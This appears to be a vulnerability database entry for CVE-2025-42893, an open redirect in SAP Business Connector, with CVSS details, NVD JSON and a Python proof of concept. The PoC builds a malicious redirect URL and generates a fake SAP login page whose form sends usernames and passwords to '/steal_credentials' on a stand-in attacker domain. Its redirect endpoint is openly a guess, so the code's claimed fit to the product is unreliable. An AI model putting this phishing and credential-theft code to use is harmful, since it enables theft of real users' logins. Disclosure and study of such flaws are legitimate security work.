Security Vulnerability Report
中文
CVE-2025-42893 CVSS 6.1 MEDIUM

CVE-2025-42893

Published: 2025-11-11 01:15:38
Last Modified: 2026-01-16 16:53:30
Source: [email protected]

Description

Due to an Open Redirect vulnerability in SAP Business Connector, an unauthenticated attacker could craft a malicious URL that, if accessed by a victim, redirects them to an attacker-controlled site displayed within an embedded frame. Successful exploitation could allow the attacker to steal sensitive information and perform unauthorized actions, impacting the confidentiality and integrity of web client data. There is no impact to system availability resulting from this vulnerability.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:sap:business_connector:4.8:*:*:*:*:*:*:* - VULNERABLE
SAP Business Connector 所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-42893 Open Redirect PoC # Target: SAP Business Connector # Attack Type: Open Redirect to Phishing Site import urllib.parse def generate_malicious_url(target_host, phishing_url): """ Generate malicious URL that exploits open redirect vulnerability Args: target_host: SAP Business Connector server hostname phishing_url: Attacker's controlled URL for phishing Returns: Malicious redirect URL """ # Encode the phishing URL for URL parameter injection encoded_phishing = urllib.parse.quote(phishing_url, safe='') # Construct the malicious URL with open redirect parameter # Common redirect parameter names in SAP Business Connector malicious_url = f"https://{target_host}/redirect?url={encoded_phishing}" return malicious_url def generate_phishing_page_template(phishing_domain): """ Generate HTML template for phishing page This simulates what an attacker might display after redirect Args: phishing_domain: Domain controlled by attacker Returns: HTML code for phishing page """ phishing_html = f""" <!DOCTYPE html> <html> <head> <title>SAP Business Connector - Session Expired</title> <style> body {{ font-family: Arial, sans-serif; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; background-color: #f0f0f0; }} .login-box {{ background: white; padding: 40px; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); }} input {{ width: 100%; padding: 10px; margin: 10px 0; border: 1px solid #ddd; border-radius: 4px; }} button {{ width: 100%; padding: 10px; background-color: #005f98; color: white; border: none; border-radius: 4px; cursor: pointer; }} </style> </head> <body> <div class="login-box"> <h2>SAP Business Connector</h2> <p>Your session has expired. Please re-authenticate.</p> <form action="http://{phishing_domain}/steal_credentials" method="POST"> <input type="text" name="username" placeholder="Username" required> <input type="password" name="password" placeholder="Password" required> <button type="submit">Login</button> </form> </div> </body> </html> """ return phishing_html # Example usage if __name__ == "__main__": target = "sap-bc.company.com" attacker_domain = "evil-phishing-site.com" # Generate the malicious redirect URL malicious_url = generate_malicious_url(target, f"http://{attacker_domain}/fake-sap-login") print(f"[+] Malicious Redirect URL: {malicious_url}") # Generate phishing page HTML phishing_html = generate_phishing_page_template(attacker_domain) print(f"\n[+] Phishing page HTML generated (save as index.html on attacker server)") print(phishing_html)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-42893", "sourceIdentifier": "[email protected]", "published": "2025-11-11T01:15:38.147", "lastModified": "2026-01-16T16:53:29.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to an Open Redirect vulnerability in SAP Business Connector, an unauthenticated attacker could craft a malicious URL that, if accessed by a victim, redirects them to an attacker-controlled site displayed within an embedded frame. Successful exploitation could allow the attacker to steal sensitive information and perform unauthorized actions, impacting the confidentiality and integrity of web client data. There is no impact to system availability resulting from this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sap:business_connector:4.8:*:*:*:*:*:*:*", "matchCriteriaId": "99F0C742-7E03-425D-BCFC-F4683843350F"}]}]}], "references": [{"url": "https://me.sap.com/notes/3662000", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.